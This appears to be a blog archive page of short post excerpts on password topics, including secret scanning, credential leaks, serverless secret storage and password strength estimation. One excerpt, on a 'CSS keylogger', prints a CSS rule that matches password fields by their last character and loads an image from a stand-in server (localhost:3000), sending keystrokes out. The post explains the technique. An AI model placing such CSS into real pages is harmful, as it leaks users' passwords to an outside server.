Customize the Password Hide/Reveal Button in Microsoft Edge

If you’re using Microsoft Edge, you might have noticed that it sports “Reveal Password” control — a little eye icon — automatically injected on the end side of password inputs: As per Edge Developer Docs: The password input type in Microsoft Edge includes a password reveal control. To make sure that the password is entered …

Ahh shhgit! – Find leaked secrets in real time across GitHub, GitLab and BitBucket

Software developers can accidentally leak sensitive information, particularly secret keys for third party services, across code hosting platforms such as GitHub, GitLab and BitBucket. These secrets — including the data they were protecting — end up in the hands of bad actors which ultimately leads to significant data breaches. Imagine being able to monitor the …

Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. …

Secrets in Serverless

Good post on how and where to store your secrets when working in a Serverless / Cloud Environment — something I was wondering about myself a little while ago Serverless applications and cloud functions often need to communicate with an upstream API or service. Perhaps they require a username and password to connect to a …

CSS Keylogger (and why you shouldn’t worry about it)

Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to …

Adobe Crossword

A crossword based on the Adobe password leak. The answers to the crossword are chosen from the 1000 most used passwords for Adobe user accounts from the recent password leak. The clues are up to 50 of the most commonly used hints for each of the passwords. Hilarious stuff! Adobe Crossword → Inspired upon XKCD …

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to remember. zxcvbn, named after a crappy password, is a JavaScript password strength estimation library. Use …